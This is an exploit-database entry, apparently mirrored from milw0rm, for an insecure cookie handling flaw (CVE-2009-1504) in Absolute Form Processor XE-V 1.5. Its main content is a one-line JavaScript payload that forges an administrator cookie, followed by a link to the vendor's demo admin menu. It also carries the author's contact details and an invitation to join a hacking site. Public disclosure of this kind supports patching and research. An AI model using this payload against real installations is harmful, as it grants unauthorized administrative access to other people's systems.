[] NeoSense
E X P L O I T S
title author type platform port cve id

Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling

Author: ZoRLu
type: webapps
platform: asp
port: 
date_added: 2009-04-23 
date_updated:  
verified: 1 
codes: OSVDB-54196;CVE-2009-1504 
tags: 
aliases:  
screenshot_url:  
application_url: 
[~] Absolute Form Processor XE-V 1.5 Insecure Cookie Handling Vuln
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 11.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] msn: trt-turk@hotmail.com
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

exploit:

javascript:document.cookie = "xlaAFPadmin=lvl=1&userid=1; path=/";

after you go here:

http://www.xigla.com/absolutefp/demo/menu.asp


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org / dafgamers.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-04-24]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.